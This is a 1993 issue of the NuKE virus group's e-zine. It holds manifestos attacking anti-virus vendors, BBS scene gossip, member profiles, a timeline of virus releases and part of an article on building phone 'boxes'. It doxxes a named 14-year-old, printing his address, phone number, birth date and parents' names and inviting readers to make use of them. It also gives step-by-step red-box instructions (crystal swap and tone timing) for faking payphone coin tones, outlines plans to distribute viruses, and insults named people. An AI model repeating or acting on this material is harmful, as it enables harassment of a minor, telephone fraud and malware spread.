===========================================================================
NuKE Info Journal #5
~~~~~~~~~~~~~~~~~~~~
March 13, 1993
~~~~~~~~~~~~~~

Article Topics.
~~~~~~~~~~~~~~

 1. Halt! Who Goes There? (An Intro from Rock Steady)
 2. State of 708 (An Intro from Nowhere Man)
 3. NuKE Australia
 4. NuKE TimeLine
 5. DTMF Generator and Structural Design to Red & White Boxing
 6. IBM 4700 Unix System, Why are these Bank System Popular?
 7. An Intro to Red Boxing
 8. McAfee's ViruScan complete Virus signature listing
 9. Viral Group? or Viral WareZ?
10. V.C.L. v2.0 Update
11. Data Encryption Standard
12. Disinfection on Fly, for your virus
13. Infection on Closing for your virus
14. Multipartite Viruses
15. Daemaen Virus
16. Sunday Telegraph Interview with Barbara Lewis
17. NuKE PoX v2.0 Sources
18. 1024 SBC Sources
19. Cyberculture
20. Truth on Gary Watson
21. Files Included in this Info Journal
22. Credits and Site Listing
===========================================================================
===========================================================================

Who Goes There? - A Fast Intro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetings, my fellow cipher-associated phreaks, and welcome to a fifth issue of our "Informational Journal" by NuKE associates, otherwise expressed as our "InfoJournal" for short. It has been perhaps a long while since our last InfoJournal; many thought we died out, as we had calls from our local AV (AntiVirus) community to check it out. I blame the long length on re-structuring, being new here I forgot I had an InfoJournal to produce, and lastly to them k0ol guys that want to take our butts and lock us up and throw away the key.

"We're back!!!"

The new InfoJournal has undergone new structural changes, the biggest being the bi-structural format: you can either execute the small 5k Hypertext file to read this like in our previous releases, or you can take out your favourite editor and read the (NK-INFO5.TXT) directly.
Nevertheless I do hope you will execute the small 5k Hypertext file as it contains features that are not in the data file, and it does a CRC-32 checksum check on the data file to make sure it has not been tampered with. Anyhow this may be the LAST InfoJournal in Hypertext format. We may present a text-only file soon enough, as we intend to make the release dates a little more frequent; perhaps a monthly journal seems to be in our interests right now.

New structural changes have been introduced into NuKE. I (Rock Steady) am perhaps the administrator of NuKE, as I play an active role in this dictating body, but nevertheless we also have other associates co-administrating NuKE with myself: Nowhere Man, Phrozen Doberman and Savage Beast are the other key-members, and we can not forget our latest additions, Screaming Radish and TäLöN.

Our goal today is not a "perfect" group, nor do we wish to rule the scene, far from the truth. In a world that is so corrupt, we try to bring order and truth! The idea of creating "robots" to perhaps reach out and set an example that we cannot be stopped is amazing! Yes, we have created viruses beyond the scope of the narrow minded AV world -- in that we are in control, and if what we must do is discredit your software then by-darn-it we will.

I hope to set an example with this organization we call "NuKE" -- we certainly DON'T think of NuKE as "just a" group. Normally a group is localized, but in our case the most powerful members are scattered on three different continents! Certainly we are not here to assimilate anyone, we simply wish to co-join ideologies.

We call ourselves "anarchist." We suffer from injustice and repression brought upon us and every non-illiterate computer user by the AV world. With that we looked into our world, the sister world, the light of freedom in the dark night! Yes, we may be "underground" but our alienation gives us the upper hand over the AV world.
We certainly know that our output perhaps will profit AVers and crush the small guys, but until the day comes that people understand that a piece of code is only code and not a biological hazard, our work is not done.

All we wish to do is simply to bring out the truth, nothing more, no conquering of the world, no destruction of computer networks, and certainly no one falling to our mercy for help. We give you what the butt-tight corporates hide from you. All we say is open your eyes, mature a little: Michelangelo will not cause every computer on the 6th day of March to die, rather it was more of a publicity stunt so that you will fill the AVers' pockets!

One amazing case is if "Rock Steady" trades a virus with a buddy, this is OUTLAWED, and we are pointed out to be the "Evil Hackers," but, if an AntiVirus person such as Frisk were to trade viruses with Joseph Greco, this is labelled as "the research of viruses." We, too, research our viruses, but we take an additional step forward -- we also research the AntiVirus products and label all of their flaws! But since we do that, the butt-tight corporate AntiVirus people label us as evil-doers. We are flesh just like yourselves.

"Fame is really your WORST enemy." (Tormentor/DY)

Perhaps the smartest quote I've seen, taken from my bud Tormentor, of Demoralized Youth.

Nevertheless, I present to you this InfoJournal #5; apparently NuKE developed farther than ever expected! And we cannot mimic anyone as there is NO ONE to mimic. From here on NuKE is treading upon "unknown" territory, and you will see that in the articles presented here. The advances are "mind-boggling!" History is in the making!

Rock Steady/NuKE
===========================================================================
===========================================================================

The State of 708
~~~~~~~~~~~~~~~~

Welcome to another exciting article detailing the triumphs and tribulations of everyone's favourite LATA, the 708/312 (Chicago) area. Since the last InfoJournal a few events have come up which deserve special attention, specifically the loss of two of the area's best boards, Ripco ][ and Nun-Beater's Anonymous, and changes at The Hell Pit. Read on for more details...

Ripco -- R.I.P.?
~~~~~~~~~~~~~~~~

Perhaps the most famous board in this area is the legendary Ripco ][, a text/message-oriented board run by Dr. Ripco. Ripco, in service since December 1983, is the area's, perhaps even the nation's, most established underground board, and draws hundreds of users from all over North America and had a huge collection of historic text files. However, Ripco is probably best known for its role in the Operation Sundevil crackdown of 1990, during which U.S. Secret Service agents broke into Dr. Ripco's apartment, detained him without cause, and seized all of his computer equipment, including the Ripco BBS. Due to complete lack of evidence, Dr. Ripco was set free, and Ripco went back up later that year with donated software and equipment.

Now, in 1993, Ripco has suffered another blow. On January 21st, Dr. Ripco decided to change his hard disk controller; being a prudent man, he backed up all files first using FastBack Plus (this was the fatal mistake). After reformatting his drives, the new controller failed to work properly. When he did a restore, however, he was in for a nasty surprise -- Fastback had failed him, and nearly all of his files were unrecoverable. Luckily, the key system files and user logs were intact, but most of the file bases were gone forever. Dr.
Ripco requests that if you have any of his old files, that you re-upload them to Ripco ][ (the number is +1-312-528-5020) or mail them to him at his post office box (Bruce Esquibel, P.O. Box 18169, Chicago, Illinois 60618, USA). Dr. Ripco says he'll be happy to reimburse you for disks and postage. I encourage everyone to chip in and support Ripco in another time of need.

Then, on March 7, there was another shocking announcement at Ripco. The following are the highlights of the message that Dr. Ripco requested be passed on to the general public:

"this is a bit difficult to do but it's got to be said. technically the board isn't closing and going away forever but some major changes are going to take place shortly and for all practical reasons, it probably isn't going to exist as you now know it.

for about the last year, myself and several individuals on the system have been toying with the idea of getting the system on internet. if you are not familiar with internet, it's a world-wide network of computer systems which basically makes a 100 line 6 gig private bbs look like a c-64 running off one floppy. the problem however is public access to it. most of you that have used internet find out about that hard lesson sooner or later. chicago seems to be one of the few places in the area where public access is a challenge. i'd like to change that.

...to continue on with this project it has come to the point of dropping dos completely and switching the system over to UNIX completely. this means the program and the bbs as you see it will be dumped. not to keep your hopes up, what will be used to replace it will look like garbage initially. it'll be difficult to use and hard to figure out unless you have some prior UNIX experience.

although i cannot be more specific on the new system at this time i do want to say that ripco ][ will be put into a suspended state, in case everything falls through and the project is abandoned, i promise to put things back to the way it was.
so this isn't quite goodbye, just a vacation of sorts." -- Dr. Ripco So it seems for now that Ripco ][ is gone, at least for a while. As of the release of this InfoJournal, Ripco is still up, although file access has removed. Let's hope for the best... The Marty Zwikel Affair ~~~~~~~~~~~~~~~~~~~~~~~ In October 1992 a local loser named Repeat Offender (real name: Marty Zwikel) decided that, given the fact that had managed to actually talk to Rock Steady, he was a bonda-fide NuKE member. Before anyone was able to stop him, Marty decided to have a flame-war with Phalcon/SKISM over VX_NET. Marty made false accusations toward Phalcon/SKISM (which I will not repeat here), then accused GarbageHeap and Count Zero of lying to him, and falsely claimed that Rock Steady and myself supported his statements. He even had the audacity to add the NuKE signature after his name. Luckily cooler tempers prevailed, and everyone came to realize that he was just a local geek posing...he soon left the net, after complaints by all parties. For those of you who may be under the mistaken belief that "Repeat Offender" is in any way affiliated with NuKE (or ever was), THIS IS NOT TRUE. In actuality, Mr. Zwikel is a fourteen-year-old local fuck who tried to make the big leagues and made a fool of himself. Let's take a closer look at this asshole, shall we? Marty Zwikel is a 14-year-old male (we think) who's currently a freshman at Buffalo Grove high school in Northwest suburban Chicago, where he has earned the nickname "Adolf." Why, you might ask? A few classmates of his chose this because "he's a stupid computer geek who has no friends and everyone hates him and we think he'll grow up to be crazy and so we call him Adolf," they say. A year or so ago he ran a board called "No Bitches Allowed" under another handle; luckily this immature punk was taught a lesson by an irritated user (who chooses to remain anonymous) and No Bitches Allowed was successfully taken down. But Marty wouldn't learn. 
He brought his board back up as "The Altar," a K-RaD 0 WaREZ board and assumed the handle "The All Powerful." Then he caught the H/P/V craze (as has most of 708, ugh) and changed his handle to "Repeat Offender," after a lame Richard Marx album. Then he publically announced on Nun-Beater's Anonymous that he was starting a "secret crashing group" called Children of the Night, and immediately mailed me demanding to co-op with NuKE. When asked what his one-man group has actually done he said "I can't tell you which boards I've crashed because you might be friends with the sysops and get angry at me." (In other words, nothing.) Then came this incident over VX_NET. Now Marty has joined a local anti-Semitic crashing group which has been harassing and crashing boards all over the area. Will this kid ever learn? Marty Zwikel lives at 3906 Mitchel Drive in Arlington Heights, Illinois with his father, Dean, and his mother, Susan. Perhaps you'd like to speak to him voice...you can reach him at +1-708-506-1980. As previously mentioned, Marty was born on July 28, 1978 and has blighted the world ever since. Perhaps some of you will find this information useful. I sure have...hehehe. Nun-Beaters Goes Down ~~~~~~~~~~~~~~~~~~~~~ In early November 1992 Guido Sanchez, BLaH president and all-around wacky dude, took down Nun-Beaters Anonymous, his world-famous BBS, for undisclosed personal reasons. N.B.A., as it is known, was best known for it's zanny message bases, sysop access for first-time callers, and complete and total lack of sysop control. In fact the sysop actually encouraged people to leech entire file bases at one time, disabling all file restrictions for all users and adding a special "/LEECH" command just for that purpose. According to Guido, N.B.A. should be back sometime soon, but, although it might have a software change, will maintain it's free-wheeling tradition. "It should be back up this summer," says Guido. 
"Actually, I don't know when it'll be back up, so whenever you're bored put it in the re-dial queue and you might get lucky. The number is +1-708-251-5094. Kick the habit, call N.B.A. today!"

As an interesting side-note, Nun-Beaters Anonymous was mentioned in Boardwatch Magazine (a print publication) for having an unusual name. "We don't even want to know," Boardwatch wrote. The strange thing about this is that N.B.A. had been down for four months when this was published.

Changes at Hell Pit
~~~~~~~~~~~~~~~~~~~

The Hell Pit, NuKE's only active Chicago site, and perhaps Chicago's only remaining quality BBS, has been undergoing some changes recently which deserve mention here.

First of all, Kato, one of the system's two sysops, has gone away to university, leaving Hades as the board's only acting sysop. All messages concerning the system should be addressed to him, *not* to Kato. Kato logs in very rarely, and only has time to read normal private mail.

Hell Pit has also purged the user list recently of the many users who don't call regularly, don't do anything but leech, etc. This is in response to the growing scarcity of disk space (though there is talk of a disk upgrade) and the tremendous in-use time of the system. FidoNet was dropped due to lack of interest, so now Hades is in the process of (finally!) adding NuKENET.

Again, contrary to rumour, Hell Pit is *NOT* a fed board. This rumour continues to resurface from time to time, but is just as untrue as ever. The Hell Pit is still active, too; some people have speculated that it's down, since the line is always busy. That's normal, folks -- Hell Pit is in use perhaps 85% of the time. So set your modem to wardial and call The Hell Pit at +1-708-459-7267 today!

Nowhere Man/NuKE
===========================================================================
===========================================================================

IJ #5 Comments by Phrozen Doberman, NuKE Australian Rep
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro
~~~~~

When most people think of Australia, they remember a famous Australian movie, _Crocodile Dundee_. Some instantly assume that we shave with six-inch knives and keep crocodiles as pets. Maybe the feds do, but not we at NuKE. Yes, we have defiantly joined the group of countries which are endlessly advancing in computer systems technology.

Before now, no-one had intended to put Australia on the map of countries where viruses are written. But time can not be separate from change, and changed we have. This year, three good .ASM coders from Australia joined NuKE in an effort to reach a common goal. Distance, race, religion and language put aside, they all put in their two-bits worth, so everyone could benefit (Frisk/McAfee _NoT_).

But the year has just begun, and it looks like it will be one that we won't forget. 1992 was the year of development, the year of brainstorming and virus writing. 1993 is the time when we wrap our presents up, when the emphasis changes from mass writing to organized virus implementation.

Gone are the days of the passive virus. The virus that runs, infects and destroys. Frisk/Tbave have put an end to that. Now, it's _their_ turn. The active virus is here to stay, and it shall stay as long as we can keep it. As virus writers, we all know our direction needs to change. The user is no longer the ultimate target, now we are to aim at destroying every last piece of user confidence in Frisk/McAfee software.

NuKE's philosophy has changed over time, and like any philosophy, it should be allowed to change.
One must never under-estimate the power of experience and thus we have come to the belief that:

    By attacking computer users, we gain nothing and anti-virus vendors gain all, but by attacking anti-virus products, we not only inundate the anti-virus companies with more work, but destroy the users' confidence in their programs.

This is the philosophy that will put the fear into every anti-virus vendor, and now it is they who will have to face this reality. We realize what Frisk/McAfee _want_ us to do, to continue doing what we have in the past, but we know better than that. If there is one thing I would like to teach McAfee/Frisk it would be to show them that they aren't dealing with any bunch of smart kiddies, because now we will become as organized as them.

One could consider such a result of this philosophy. For every user who loses confidence in Frisk/McAfee and returns to NAV/CPAV, we are giving our future viruses a much better chance of survival. Frisk/McAfee deal the cards, they _have_ the support of the IBM PD world. NAV/CPAV receive the cards, thus they lack in keeping updated. This is what we need to exploit.

I'm not going to sit here and make statements that I don't believe in. Nor could I be bothered using this introduction as some egotistical experience. I am here to tell you, the follower, onlooker, or participant of NuKE, that we are not just any underground group.

I admit, I can't write a virus for shit. In fact, my role in NuKE has nothing to do with viruses. My best contribution to NuKE is in its management. I can only tell you using the knowledge that I have learnt over time, that no matter how good your programmers are, no matter how good your tutorials are, no matter how good you can hack or crack F-prot/McAfee, it will be wasted if it's not implemented properly.

I only want one thing from NuKE. I want to see the group reach its full potential.
If I can help make the basis of NuKE a platform more suitable for other experienced programmers to use, then that is what I aim to do.

This is the year where NuKE will be reforming many of its practices. You are not just observing a group of highly skilled programmers, going about their work, but a group with a highly organized structure. Organization is the way NuKE will survive. It is how we can stop the Frisk/McAfee team beating us. It can help us in every way, shape and form, with beta-testing, virus distribution, info distribution, nukenet management, and most importantly, a single combined push for the active anti-Frisk/anti-McAfee virus code.

This is not the time or place to start talking about NuKE-Net organization in depth. NuKE-CoNF will deal with that. What is NuKE-CoNF? In short, it is going to be a detailed system analysis of NuKE, so we can optimize our procedures, and not just make them into efficient ones, but the best. Anyone can contribute to NuKE-Conf, so long as you are a NuKE member or associate. VX/P-S associates may also contribute ideas. All submissions will be worked over, compared with other submissions, and modified if necessary. Unfortunately, NuKE can not guarantee that results of NuKE Conf will be published.

Before I continue, I make one pledge to all those reading this. If we, as virus writers, want to achieve our goals, then we need to work together. We need to understand our weaknesses and our strengths, and improve our systems where possible, for any group which can do this does not just exist as a magnetic particle on a hard disk somewhere on someone's computer but continues to succeed with the spirit of every participating member, the spirit of NuKE.

Thank You.

Phrozen Doberman
Melbourne, Australia
22nd February, 1993

New Info
~~~~~~~~

I am now beta-testing a Tic File Distribution link between myself and Screaming Radish. It seems to be working fine, and if implemented, all members will benefit.
First, however, let me explain what "TiC" is all about. "TiC" or TDF (Tick File Distribution) as we will refer to it is a way in which NuKENET BBS's can transfer files between each other in a very simple and automatic way. "TiC" will attach a hatched file (that is, a file you intend *everyone* to have, ie: InfoJournals) to your Front Door, D'Bridge or similar Fido-standard-compatible mail handler.

A quick example: Rock Steady wants to release a new virus, but he wants to make sure everyone gets it. He places a .ZIPped copy of the virus's kernel in a special area where his "TiC" processor (ie: FileMgr) will identify this virus as a new file to be hatched. His "TiC" processor then determines what systems are in the export list, and attaches this file (as a netmail file attach) to each node in the export list, along with a file with an extension ending in .TIC. Inside this .TIC file, is the file areas name, a description and seen-by's.

I suggest that the following areas are set up:

VIRUS_BETA   = Internal beta-testing viruses. Never to be released. Only for members. All bug reports via NuKENET.
VIRUS_FINAL  = Final kernels of viruses. _MUST_ have been beta-tested. Not for release to the general public.
VIRUS_INFECT = Infected programs with the virus so we may under "beta-testers."
VIRUS_SOURCE = All virus source.
VIRUS_EXTRA  = Odd things. Including IJ's.

All comments, via NuKENET please.

New Memberz
~~~~~~~~~~~

I'd like to announce the following new NuKE members:

Screaming Radish - NuKE Aust. Vice Rep
Shindaq Arl'hur  - Member
The Wierd One    - Member
TäLöN            - Member

Left Memberz
~~~~~~~~~~~~

I'd like to announce the following memberz have left:

Lord Venom and Screaming Jesus

The Pit BBS is *NO LONGER* a NuKE support BBS.

Memberz Analysis
~~~~~~~~~~~~~~~~

Although there existed a stage where I was the only NuKE Australian member, the festive season has brought many a virus writer out of the closet.
The three new members, S.R., Shindaq and TäLöN, all have previous experience with writing viruses.

Screaming Radish: is extremely skilled in stealth and memory
~~~~~~~~~~~~~~~~  addressing techniques, saying such a statement is like saying the E=MC² was an okay formula. SR is MC², SR has abilities never dreamed about. You have a problem SR will get you a solution! We hated that memory loss in TSR Viruses, so SR got us a routine to steal buffers from DOS, and used those as allocating a virus! As DOS buffers are about 512 bytes each, stealing 3-4 will result in no harm to the system and NO MEMORY CHANGE AT ALL! Amazing! And we laughed at Proto-T? And the list goes on...

Shindaq: Has been disabling viruses for a few years, and specializes
~~~~~~~  in dropper-type viruses. He has also written a dropper-type virus from scratch.

TäLöN: Has been a virus writer for years, here's his background, in his
~~~~~  own words:

"Hi there, I am typing to you from Newcastle, New South Wales, Australia. I am not new to the virus scene, in fact I was a member of the puppet group [PuKE].

Just a quick background on PuKE: it was set up about a year ago by Harry McBungus (who wrote X-Fungus, No Frills 2.0 and No Frills 3.0, all unremarkable) simply as a stuff-around, paying out on NuKE. Harry saw NuKE getting large egos over large, non-resident direct-action viruses: in other words he thought they were idiots. Hence, PuKE endeavoured to write things which compared to NuKE WareZ but on a far smaller code scale. The fruits of Harry's labours were 'stolen' by myself, however, and that is how they grew in the wild; otherwise they would not be around. Although PuKE disliked NuKE, everything grows in stages, people mature, and since then NuKE has evolved into the best Power Virus Group in the world. (As a side note, Harry left the scene in around June 1992, as a result of something called a Fraud squad. Good luck to Harry in whatever he is now doing.)

I, TäLöN, defected to NuKE shortly after writing the Dudly virus (also known as No Frills 4.0 and V2P6Z Mark 2, which was stolen off me by someone hacking into my board. I had no intention of releasing it into the wild. It's unremarkable besides its lame polymorphism, which is similar to V2P6 in end result, not generation)

I have not added anything to the virus scene since the writing of Dudley-1, but grew active a month ago with the creation of another, yet-to-be-named virus, namely a 3k COM/EXE/SYS/BIN/OVL/MBR/BS infecting, polymorphic stealth virus. It hides partition infection; it hides file size increase on directory; it infects boot sectors of ANY floppy format, current or future, on read/write access; it infects hard disk partition on infected disk boot or infected file execution on virgin system, and so on. One mother of a virus. However, I have taken great care not to make it destructive in any way, so no stupid AV researcher can point the finger and spin the typical anti-virus rhetoric, 'Bad virus, bad virus, didn't you know every virus will destroy precious hours of work.'

My opinion of AV researchers in general is very low. I take great pride in totally debunking their theories and stereotypes. I am NOT a social recluse. I do not have a sunken chest, nor am I fat or a cowardly insignificance. I possess a fair degree of common sense. I do not go out of my way to trash boards or computers; in fact I steer away from such things. Furthermore, I do not view virus writing or the discussion of viruses a taboo subject. Most of all I do not try to keep the public in the dark about what viruses can and cannot do. Harry McBungus shared basically the same views but when he tried to speak out and 'educate' the public, he instead got nailed by the press. (The media is another of my pet hates.)

Anyway I have lost patience with hierarchy and bureaucracy...
and the media, the government and the public can basically suck John McAfee's dick while he laughs all the way to the bank. We have provided an income for John for long enough, it's time to make SCAN look like the total crock of shit that it has always been.

Before I leave, just a few quick hi's, ho's and 'thanks' to:

John McAfee: Fuck You

Patricia 'It is unknown what this virus does besides replicate' Hoffman: How about you get a clue before you make out you're the big-wig virus analyzer. VSUM is the biggest farce since ViruScan itself.

Sara Gordon: for all the laughs your ridiculous psychological theories about virus writers gave me. Try a bit harder.

Matt: for all the cool times we had. The legend of the 50-cent piss-up will never leave my memory banks.

Pantera, Metallica: for providing an awesome soundtrack for virus development!

and to NuKE for making everything possible.

TäLöN/NuKE"

All in all, you will be seeing a lot more from NuKE Australia this year. We have refocused on the job, have a brand-new line up (new blood rarely does harm) and we have a direct vision for the future. All of this would be hard to achieve without the coherence, unity and strength of NuKE!

Final Note
~~~~~~~~~~

Here is where you all get your compliments!

A big thanks to Rock Steady, for keeping the NET alive. Overall, he has managed NuKENET in the best way possible, and this does deserve some positive feedback. I would also like to thank him for all the charges he has incurred while keeping the NuKENET link alive! Yes, NuKENET pays for its calls. No illegal crap in our camp!

Secondly, I would like to thank Nowhere Man for supplying us with beta versions of NED, Screaming Radish for helping me when I needed suggestions and technical advice, Shindaq for keeping the BBS alive, TäLöN for helping out and keeping your cool, and last but not least, Savage Beast for keeping an excellent database of viruses.

Hubbada, Hubbada, and good virus writing to you all....

Please address all correspondence to: Phrozen Doberman,111:950/3@Nuke_NET

Phrozen Doberman/NuKE
===========================================================================
===========================================================================

A NuKE Timeline
~~~~~~~~~~~~~~~

--------------------------------------------------------------------------
October 1992

NED (NuKE Encryption Device) is completed, an encryption engine that is very simple to use, yet overcomes all of the "flaws" of MtE to become perhaps the wildest engine out, with an ability to understand code and compile its very own code. Amazing. VCL v2.0 will "field test" the success of this NuKE product by Nowhere Man.
--------------------------------------------------------------------------
November 1992

NuKE-PoX Virus version 2.0 noted as a common North-American virus in VSUM.
--------------------------------------------------------------------------
November 1992

NuKENET joins with VX_NET from ARiSToLE's board.
--------------------------------------------------------------------------
November 1992

NuKENET is extended not only to Australia, but, with the help of Savage Beast, is also expanded to Europe. Demoralized Youth of Sweden gets on NuKENet, along with other supporting countries like the Netherlands, Switzerland, and Bulgaria.
--------------------------------------------------------------------------
November 1992

NuKE encounters "Death Angel" of Toronto, the virus programmer of the original ONTARIO-512 and ONTARIO-1024 (aka 1024-SBC). Death Angel made himself a NuKE supporter. In our InfoJournal #3 we disassembled the Ontario-512 virus, and as a result the Ontario-730 was derived from it (which was NOT programmed by Death Angel!). Both viruses got listed as common viruses in North America! Death Angel also gave us his original source of Ontario-512 and -1024 (which we include in this issue).
--------------------------------------------------------------------------
December 1992

Screaming Radish joins up with the NuKE Team. His abilities with the 80x86 are mind-boggling and is known for the best all-nighters that I've ever seen... Even though relations with Screaming Radish go "WAY-BACK" (he was considered part of us for a while), only NOW did Screaming Radish officially join NuKE by completing his "test-of-NuKEhood" in the Australian outback, and as a proven hacker he succeeded in hiding his tracks and killing the Bushmen and crocodiles on his tail... [What can I say, it's tough to become an Aussie-NuKEer! :-)]
--------------------------------------------------------------------------
January 10th, 1993

TäLöN enough respect goes out to this charm... He too has succeeded the wild-bush hunt of the Aussie, though he was never the same afterward... Just as Compton was put on the map by the Brothers, TäLöN is the one to put Aussie onto the map. For that I gave him a whole paragraph in this intro...
--------------------------------------------------------------------------
January 10th, 1993

Paul Ferguson thinks he's an amazing god with connections (for the local strawberry club) since he knows how to use Directory Assistance and called NuKE up! Big-ol' Pauly cried on our shoulders that [and we quote] "ITS A POLYMORPHIC WAR OUT THERE! (sob, cough, snort)" Huh? Paul got a copy of TPE. (Yeah right! He heard of it and wanted to know if we had it!). All in all Paul showed himself to be a powerful man, with very powerful friends, and was able to prove that he was THE god being able to crush us with a snap of his fingers. For this NuKE awarded Paul with the NuKE Wanker of the Year award. It's the FIRST time NuKE presented such an award, so we named it after Paul, therefore with respect we now call it...

"The NuKE Big-Ol' Paul Ferguson Wanker Award"

We were going to send him a picture of a horse's ass and sign it, but we figured a mirror will pretty much be the same, but cheaper...
--------------------------------------------------------------------------
January 24th, 1993

Daemaen Virus created by TäLöN. This virus will infect ANYTHING that moves. It will infect .EXEs, COMs, OV?s, SYSs, BINs, floppy boot sectors, and HD partition tables. It also contains a dir-stealth routine, and will infect files on open, creation, close, browsing, attribute functions, you name it... A very fast, extremely fast infector. Its features will be embedded inside VCL v2.0, coming soon in a computer near you...
--------------------------------------------------------------------------
February 1993

The Weird One and Shindaq Arl'hur have joined the NuKE team. Their abilities are also well spoken of, being amazing guys and an asset to the Team. (Though it'd be cooler if they talked a little more...) Hiya' Guys!
--------------------------------------------------------------------------
February 1993

The Dark Elf Virus, by Shindaq Arl'hur, comes alive. It is another multipartite virus that infects boot sectors and HD Partition as well as .EXE and .COM files. With stealth boot abilities it too will have its features embedded inside VCL v2.0.
--------------------------------------------------------------------------
February 2nd, 1993

Rock Steady goes to the local post office and mails two letters to two NuKE members who will remain unknown (Phrozen Doberman and TäLöN) and yet where did the letters end up? [Thanks for telling me you got 'em! NOT!]
--------------------------------------------------------------------------
February 8th, 1993

ARCV of England gets busted BIG-TIME. Apache Warrior and his followers are charged with computer fraud for the purpose of causing damage with self-replicating code (viruses).
England flips, and the nation of n0-Crimez wonders how to control this
loop in the hole. An "example" is supposed to be made of the group to
scare others from repeating their actions!
--------------------------------------------------------------------------
February 15th, 1993
Barbara Lewis from the English newspaper _Sunday Telegraph_ calls up NuKE
for a one-on-one interview. The bitch got nothing, as we've already
visited Compton. But she pulled a strawberry act on us -- yup, she gave us
her number, and now NuKE and Barbara got a hot "soap-opera" relation
going! Our favourite "girlfriend-boyfriend" saying is "Bitch, get off my
wanker!"
--------------------------------------------------------------------------
March 1st, 1993
Rock Steady had a vision of releasing the NuKE InfoJournal today, but
federal officers thought otherwise... [BiTE Me]
--------------------------------------------------------------------------
March 12th, 1993
After visiting Compton, Rock Steady had the sudden urge to rap out the
words to the song "Fuck Tha Police" by NWA while entering the station with
a logo "Blow away the pigs" embedded on his t-shirt, visiting his parole
officer...
--------------------------------------------------------------------------
===========================================================================
===========================================================================

              DTMF Generators, White Boxing, and Red Boxing
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I've seen before me way too many fabrications of red boxes; the H/P
community enjoys talking about it a lot, and fantasizing about its
abilities. But seldom do I see an accurate example of any box
construction. Perhaps I'm simply in the wrong circle? Nevertheless I did a
little research on the actual structure of a DTMF Generator and on how to
convert this into a red and white box.

2600 Enterprises did have the BEST red box example to pass before me,
however in Canada legislation differs quite a lot, and any kit or package
that can be hacked is not tolerated; so therefore the famous Radio-Shack
Pocket Dialer is not available here, and I would say many other places,
such as Europe or Australia, where Radio Shack is not as widely
established as in the USA. Our Radio Shacks are no bigger than a local
corner candy store, and the only useful products they sell are
calculators. Pathetic is the scene I run into everywhere I go in lovely
Canada.

So since the Radio-Shack Pocket Dialer WITH MEMORY is not available I
guess we must build the actual device from scratch. It's fairly simple,
and I've already succeeded in building the DTMF Generator. It's very easy
-- it consists of one IC, a crystal to control the oscillator (in the IC)
and a key-pad. The construction of the DTMF Tone Generator is perhaps the
hardest part of this project, and yet that is fairly simple. Anyhow this
project does require you to know the basics of kit building, and hopefully
you know how to use a soldering iron, as you will need to solder the IC
and Crystal onto a simple board.

Now the DTMF tones are generated internally inside the IC, but the timing
depends on an external crystal oscillator. And the only external component
we have is the 3.579545 MHz crystal: right here we have a "white box," as
a white box is supposed to generate the DTMF "Touch-Tone" tones. Now if we
replaced the 3.579545 MHz crystal with a 6.5536 MHz one, our "*" key on
the key-pad will actually be DARN close to 3900 Hertz, the EXACT frequency
that a coin stimulates when being entered inside the payphone. So in
reality instead of putting $0.25 you can put these tones on the mouth
piece and fool the Bell System.

Brief Operation
~~~~~~~~~~~~~~~
When entering a $0.25 into a payphone the only way the phone company knows
that you entered money is by a tone which consists of a 700 Hz + 2200 Hz
(3900 Hz) being flushed into the line. For a quarter you will need 3900 Hz
for 35ms in length and a pause for 35ms and then 3900 Hz for 35ms then a
pause...etc. This must be produced exactly FIVE times, so you should have
five tones of 3900 Hz of 35ms with pauses of 35ms between each.

Our DTMF generator contains a ten-number memory. When we save a number
into the DTMF memory and replay it, the redial timing will play the tone
for 72.3ms and pause for 72.3ms before going to the next tone and playing
that for 72.3ms! Now the tones will be played at this speed ONLY with the
3.579545 MHz crystal, as the crystal controls ALL LOGIC and TONE
GENERATING TIMING! So when this is replaced with a 6.5535 Mhz crystal it
naturally will be a lot faster and the timing will be faster. As a matter
of fact the timing is NOW 34.3ms! So anything redialled by the DTMF
generator will come out at 34.3ms and a pause for 34.3ms. Our "*" key will
also sound very close to the 700 + 2200 Hz, and therefore saving "*" 5
times in a memory and redialling it will result in sounding like a $0.25;
all one has to do is put the red box to the payphone mouth piece and the
phone system will think you entered a valid $0.25.

 _____________________
/ General Description \____________________________________________________

Features
~~~~~~~~
 ■ 2.5V-12V operation when generating tones, which is A LOT less voltage
   needed, compared to several white boxes I've seen which ask for
   16V-24V.
 ■ Stores and auto-dials ten 16-digit numbers.
 ■ Last number redial.
 ■ Scratchpad, meaning number storage without dialling.
 ■ 14 Keys, separate storage and redial buttons.
 ■ 2-digit overwrite for PBX access codes.
 ■ Low harmonic distortion.
 ■ Single-contact or negative-common (2-of-8) key-pad inputs.

Well, before we begin I must say that replacing the 3.57545 Mhz crystal
with a 6.5536 will give us the 3900 Hertz tone ONLY by the "*" key. With
this information the same is true for any key, on the keypad! In fact my
calculations proved that in order to get an EXACT 3900 Hertz by the "*"
key we would need a crystal of about 6.4857 Mhz. However chances of
production of a 6.4857 Mhz crystal is asking for a little too much, so
naturally we settle for the closest one possible to it; besides analog
signals are quite difficult to simulate exactly, compared to digital,
which is always exact!

This IC is from "National Semiconductor Corporation" model number TP5660.
Perhaps even the exact IC in the Radio-Shack Pocket Dialer with Memory, as
the one without memory uses the TP5650 which is this exact IC but without
memory! The Operating temperature is -30°C to +60°C. This IC looks like
so:

                              1┌─────┬──┬──────┐16
                          Vdd──┤     └──┘      ├───TONE OUT
                              2│   National    │15
                           Vm──┤ Semiconductor ├───Row 5
                              3│    (Linear    │14
                        Col 1──┤   Databook)   ├───Row 1
                              4│               │13
                        Col 2──┤               ├───Row 2
                              5│    TP5660     │12
                        Col 3──┤               ├───Row 3
                              6│               │11
                          Vss──┤               ├───Row 4
                              7│               │10
     ┌─────────────────OSC─IN──┤               ├───MUTE OUT
    ┬┴┬ 3.579545 Mhz Crystal  8│               │9
    ┴┬┴ Control OSC. ┌OSC─OUT──┤               ├───Col 4
     └───────────────┘         └───────────────┘

Replace above with the below to have both Red & White Boxes in one.

     ┌───┬────
    ┬┴┬ ┬┴┬   <- 3.579545 Mhz
    ┴┬┴ ┴┬┴
     └ │ ┘    <- If you put a two-way switch you can switch from crystal
       └──────   to crystal, and you'll have a red and white (combo) box!
                 Your new crystal should be 6.5536 for "*" Key

Pin Description
~~~~~~~~~~~~~~~
Vdd (Pin 1): The positive supply to the device, referenced to Vss. A
power-on reset circuit ensures correct operation following initial
power-up.

